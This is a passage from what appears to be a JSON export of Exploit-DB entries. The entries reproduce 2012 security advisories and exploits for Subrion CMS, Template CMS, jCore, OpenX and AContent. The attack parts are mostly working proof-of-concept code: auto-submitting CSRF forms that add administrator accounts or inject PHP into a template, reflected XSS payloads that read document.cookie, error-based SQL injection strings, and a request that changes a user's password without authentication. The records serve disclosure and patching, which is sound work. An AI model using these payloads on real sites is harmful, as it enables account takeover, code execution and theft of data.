via the \"f[accounts][fullname]\" and \"f[accounts][username]\" GET parameters to /advsearch/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/advsearch/\" method=\"post\">\r\n<input type=\"hidden\" name=\"items[]\" value='accounts' />\r\n<input type=\"hidden\" name=\"f[accounts][fullname]\" value='\"><script>alert(document.cookie);</script>' />\r\n<input type=\"hidden\" name=\"f[accounts][username]\" value='\"><script>alert(document.cookie);</script>' />\r\n<input type=\"hidden\" name=\"q\" value='' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n2.2 Input passed via the \"id\" and \"group\" GET parameters to multiple files is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website.\r\n\r\nThe following PoCs demonstrate the vulnerabilities:\r\n\r\nhttp://[host]/admin/accounts/edit/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/admin/configuration/?group=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/admin/manage/fields/edit/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/admin/manage/blocks/edit/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n3) \u0421ross-Site Request Forgery (CSRF) in Subrion CMS: CVE-2012-4773\r\n\r\nThe application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary SQL code.\r\n\r\nAn attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.\r\n\r\nThe following PoC creates administrative account within application:\r\n\r\n\r\n<form action=\"http://[host]/admin/accounts/add/\" method=\"post\">\r\n<input type=\"hidden\" name=\"username\" value='new_admin' />\r\n<input type=\"hidden\" name=\"fullname\" value='new_admin' />\r\n<input type=\"hidden\" name=\"email\" value='new_admin@mail.com' />\r\n<input type=\"hidden\" name=\"usergroup\" value='1' />\r\n<input type=\"hidden\" name=\"status\" value='active' />\r\n<input type=\"hidden\" name=\"_password\" value='_password' />\r\n<input type=\"hidden\" name=\"_password2\" value='_password' />\r\n<input type=\"hidden\" name=\"save\" value=\"Add\" />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.getElementById('btn').click();\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Subrion 2.2.3\r\n\r\nMore Information:\r\nhttp://www.subrion.com/forums/announcements/934-subrion-2-2-3-open-source-cms-core-available.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23113 - https://www.htbridge.com/advisory/HTB23113 - Multiple vulnerabilities in Subrion CMS.\r\n[2] Subrion CMS - http://www.subrion.com/ - Subrion CMS is a stand-alone PHP content management system that is very easy to use. It comes with a ton of great features including full source editing, per-page permissions, user activity monitoring, and much more.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22159/"}, {"lastseen": "2016-02-02T17:09:45", "osvdbidlist": ["85896", "85895"], "references": [], "description": "template CMS 2.1.1 - Multiple Vulnerabilities. CVE-2012-4901,CVE-2012-4902. Webapps exploit for php platform", "edition": 1, "reporter": "High-Tech Bridge SA", "published": "2012-10-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "template CMS 2.1.1 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4901", "CVE-2012-4902"], "modified": "2012-10-04T00:00:00", "id": "EDB-ID:21742", "href": "https://www.exploit-db.com/exploits/21742/", "sourceData": "Advisory ID: HTB23115\r\nProduct: Template CMS\r\nVendor: template-cms.ru\r\nVulnerable Version(s): 2.1.1 and probably prior\r\nTested Version: 2.1.1\r\nVendor Notification: September 12, 2012 \r\nPublic Disclosure: October 3, 2012 \r\nVulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]\r\nCVE References: CVE-2012-4901, CVE-2012-4902\r\nCVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Template CMS, which can be exploited to perform Cross-Site Scripting (XSS) and \u0421ross-Site Request Forgery (CSRF) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Template CMS: CVE-2012-4901\r\n\r\nInput passed via the \"themes_editor\" POST parameter to /admin/index.php is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website.\r\n\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/admin/index.php?action=add_template&id=themes\" method=\"post\">\r\n<input type=\"hidden\" name=\"themes_editor\" value='</textarea><script>alert(document.cookie);</script>' />\r\n<input type=\"hidden\" name=\"themes_editor_name\" value='' />\r\n<input type=\"hidden\" name=\"add_template\" value='' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n\r\n2) \u0421ross-Site Request Forgery (CSRF) in Template CMS: CVE-2012-4902\r\n\r\nThe application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary PHP code.\r\n\r\nAn attacker has to trick a logged-in administrator to visit a malicious web page containing the following code that will add a new administrator to the CMS:\r\n\r\n\r\n<form action=\"http://[host]/admin/index.php?id=system&sub_id=users&action=add\" method=\"post\">\r\n<input type=\"hidden\" name=\"login\" value='newadmin' />\r\n<input type=\"hidden\" name=\"password\" value='password' />\r\n<input type=\"hidden\" name=\"email\" value='newadmin@mail.com' />\r\n<input type=\"hidden\" name=\"role\" value='admin' />\r\n<input type=\"hidden\" name=\"register\" value='' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.getElementById('btn').click();\r\n</script>\r\n\r\n\r\n\r\nThe second PoC adds arbitrary PHP code (phpinfo() in our case) into CMS's page: \r\n\r\n\r\n<form action=\"http://[host]/admin/index.php?id=themes&action=edit_template&file=aboutTemplate.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"themes_editor_name\" value='about' />\r\n<input type=\"hidden\" name=\"themes_editor\" value='<? phpinfo(); ?>' />\r\n<input type=\"hidden\" name=\"old_name\" value=\"about\" />\r\n<input type=\"hidden\" name=\"edit_template\" value='' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.getElementById('btn').click();\r\n</script>\r\n\r\n\r\nThe phpinfo() function will be executed [if allowed by web server configuration] on the following web page:\r\n\r\nhttp://[vulnerable_host]/about\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23115 - https://www.htbridge.com/advisory/HTB23115 - Multiple vulnerabilities in Template CMS.\r\n[2] Template CMS - http://template-cms.ru - Template CMS is a fast and simple content management system written in PHP.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21742/"}, {"lastseen": "2016-02-02T16:04:16", "osvdbidlist": ["85999"], "references": [], "description": "Subrion CMS 2.2.1 - CSRF Add Admin Exploit. CVE-2012-4773. Webapps exploit for php platform", "edition": 1, "reporter": "LiquidWorm", "published": "2012-09-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "Subrion CMS 2.2.1 - CSRF Add Admin Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4773"], "modified": "2012-09-12T00:00:00", "id": "EDB-ID:21267", "href": "https://www.exploit-db.com/exploits/21267/", "sourceData": "<!--\r\n\r\n\r\nTitle: Subrion CMS 2.2.1 CSRF Add Admin Exploit\r\n\r\n\r\nVendor: Intelliants LLC\r\nProduct web page: http://www.subrion.com\r\nAffected version: 2.2.1\r\n\r\nSummary: Subrion is a free open source content management system. It's\r\nwritten in PHP 5 and utilizes MySQL database. Subrion CMS can be easily\r\nintegrated into your current website or used as a stand alone platform.\r\nIt's extremely flexible and scalable php system that stands for a content\r\nmanagement framework.\r\n\r\nDesc: The application allows users to perform certain actions via HTTP\r\nrequests without performing any validity checks to verify the requests.\r\nThis can be exploited to perform certain actions with administrative\r\nprivileges if a logged-in user visits a malicious web site.\r\n\r\n - Usergroup 1 - Administrator\r\n - Usergroup 2 - Moderator\r\n - Usergroup 8 - Registered\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\r\n Apache 2.4.2 (Win32)\r\n PHP 5.4.4\r\n MySQL 5.5.25a\r\n\r\n\r\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nVendor status:\r\n\r\n[05.09.2012] Vulnerability discovered.\r\n[06.09.2012] Contact with the vendor.\r\n[07.09.2012] Vendor responds asking more details.\r\n[07.09.2012] Sent detailed information to the vendor.\r\n[10.09.2012] Vendor creates patch.\r\n[11.09.2012] Vendor releases version 2.2.2 to address this issue.\r\n[11.09.2012] Coordinated public security advisory released.\r\n\r\n\r\nAdvisory ID: ZSL-2012-5106\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5106.php\r\n\r\n\r\n05.09.2012\r\n\r\n\r\n-->\r\n\r\n\r\n<html>\r\n<head>\r\n<title>Subrion CMS 2.2.1 CSRF Add Admin Exploit</title>\r\n</head>\r\n<body><center><br />\r\n<form method=\"post\" action=\"http://localhost/subrion/admin/accounts/add/\" onsubmit=\"forge()\">\r\n<input type=\"hidden\" name=\"username\" value=\"Commando\" />\r\n<input type=\"hidden\" name=\"fullname\" value=\"Arnold Schwarzenegger\" />\r\n<input type=\"hidden\" name=\"email\" value=\"lab@zeroscience.mk\" />\r\n<input type=\"hidden\" name=\"_password\" value=\"l33tP4ss!\" />\r\n<input type=\"hidden\" name=\"_password2\" value=\"l33tP4ss!\" />\r\n<input type=\"hidden\" name=\"usergroup\" value=\"1\" />\r\n<input type=\"hidden\" name=\"avatar\" value=\"\" />\r\n<input type=\"hidden\" name=\"sponsored\" value=\"0\" />\r\n<input type=\"hidden\" name=\"plan_id\" value=\"1\" />\r\n<input type=\"hidden\" name=\"sponsored_end\" value=\"\" />\r\n<input type=\"hidden\" name=\"status\" value=\"active\" />\r\n<input type=\"hidden\" name=\"save\" value=\"Add\" />\r\n<input type=\"hidden\" name=\"goto\" value=\"list\" />\r\n<input type=\"hidden\" name=\"old_name\" value=\"ZSL\" />\r\n<input type=\"hidden\" name=\"id\" value=\"\" />\r\n<input type=\"submit\" id=\"exploit\" value=\"Forge!\" />\r\n</form></center>\r\n<script type=\"text/javascript\">\r\nfunction forge(){document.getElementById(\"exploit\").click();}\r\n</script>\r\n</body>\r\n</html>\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21267/"}, {"lastseen": "2016-02-04T06:58:06", "osvdbidlist": ["86495"], "references": [], "edition": 1, "description": "jCore /admin/index.php path Parameter XSS. CVE-2012-4231. Webapps exploit for php platform", "reporter": "High-Tech Bridge", "published": "2012-10-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "exploitdb", "title": "jCore /admin/index.php path Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4231"], "modified": "2012-10-17T00:00:00", "id": "EDB-ID:37950", "href": "https://www.exploit-db.com/exploits/37950/", "sourceData": "source: http://www.securityfocus.com/bid/56102/info\r\n\r\njCore is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nAn attacker may exploit these issues to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n\r\njCore 1.0pre and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20%27 ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37950/"}, {"lastseen": "2016-02-04T06:56:15", "osvdbidlist": ["86092"], "references": [], "edition": 1, "description": "OpenX /www/admin/plugin-index.php parent Parameter XSS. CVE-2012-4989. Webapps exploit for php platform", "reporter": "High-Tech Bridge", "published": "2012-10-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "exploitdb", "title": "OpenX /www/admin/plugin-index.php parent Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4989"], "modified": "2012-10-10T00:00:00", "id": "EDB-ID:37938", "href": "https://www.exploit-db.com/exploits/37938/", "sourceData": "source: http://www.securityfocus.com/bid/55860/info\r\n\r\nOpenX is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n\r\nOpenX 2.8.10 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E [XSS] ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37938/"}, {"lastseen": "2016-02-02T18:06:47", "osvdbidlist": ["86424", "86427", "86425"], "references": [], "edition": 1, "description": "atutor 1.2 - Multiple Vulnerabilities. CVE-2012-5167,CVE-2012-5453. Webapps exploit for php platform", "reporter": "High-Tech Bridge SA", "published": "2012-10-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "atutor 1.2 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5167", "CVE-2012-5453"], "modified": "2012-10-22T00:00:00", "id": "EDB-ID:22160", "href": "https://www.exploit-db.com/exploits/22160/", "sourceData": "Advisory ID: HTB23117\r\nProduct: AContent\r\nVendor: ATutor\r\nVulnerable Version(s): 1.2 and probably prior\r\nTested Version: 1.2\r\nVendor Notification: September 26, 2012 \r\nPublic Disclosure: October 17, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Cross-Site Scripting [CWE-79]\r\nCVE References: CVE-2012-5167, CVE-2012-5168, CVE-2012-5169\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks.\r\n\r\n\r\n1) SQL Injection in AContent: CVE-2012-5167\r\n\r\n1.1 The vulnerability exists due to insufficient sanitation of input data in the \"field\" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database. \r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/course_category/index_inline_editor_submit.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"field\" value=\"category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))\" />\r\n<input type=\"hidden\" name=\"value\" value=\"1\" />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient sanitation of input data in the \"field\" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database. \r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n<form action=\"http://[host]/user/index_inline_editor_submit.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"field\" value=\"password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1\" />\r\n<input type=\"hidden\" name=\"value\" value=\"1\" />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n1.3 Input passed via the \"id\" GET parameter to /user/user_password.php in POST request is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability: \r\n\r\n\r\n<form action=\"http://[host]/user/user_password.php?id=1' AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20--%20\" method=\"post\">\r\n<input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nSuccessful exploitation of vulnerability 1.3 requires attacker to be registered and logged-in.\r\n\r\n\r\n2) Improper Authentication in AContent: CVE-2012-5168\r\n\r\n2.1 The vulnerability exists due to absent authentication in the \"/user/index_inline_editor_submit.php\" script. A remote unauthorized attacker can change users' passwords.\r\n\r\nThe following example will change password for user with id=1 to 'password'.\r\n\r\n\r\n<form action=\"http://[host]/user/index_inline_editor_submit.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"field\" value=\"password-1\" />\r\n<input type=\"hidden\" name=\"value\" value=\"5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8\" />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n2.2 The vulnerability exists due to absent authentication in the \"/course_category/index_inline_editor_submit.php\" script. A remote unauthorized attacker can modify names for existing categories.\r\n\r\nThe following example will change category name with id=1 to 'new_category':\r\n\r\n\r\n<form action=\"http://[host]/course_category/index_inline_editor_submit.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"field\" value=\"category_name-1\" />\r\n<input type=\"hidden\" name=\"value\" value=\"new_category\" />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n\r\n3) Cross-Site Scripting (XSS) in AContent: CVE-2012-5169\r\n\r\nInput passed via the HTTP GET parameters \"pathext\", \"popup\", \"framed\", and \"file\" to /file_manager/preview_top.php is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website.\r\n\r\nThe following PoCs (Proof of Concept) demonstrate the vulnerabilities:\r\n\r\nhttp://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUsers should apply patches #1 and #2 using the AContent Administrator's Updater tool\r\n\r\nMore Information:\r\nhttp://update.atutor.ca/acontent/patch/1_2/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23117 - https://www.htbridge.com/advisory/HTB23117 - Multiple vulnerabilities in AContent.\r\n[2] AContent - http://atutor.ca - AContent is an open source learning content authoring system and respository used to create interoperable, accessible, adaptive Web-based learning content.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u017d is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22160/"}]}
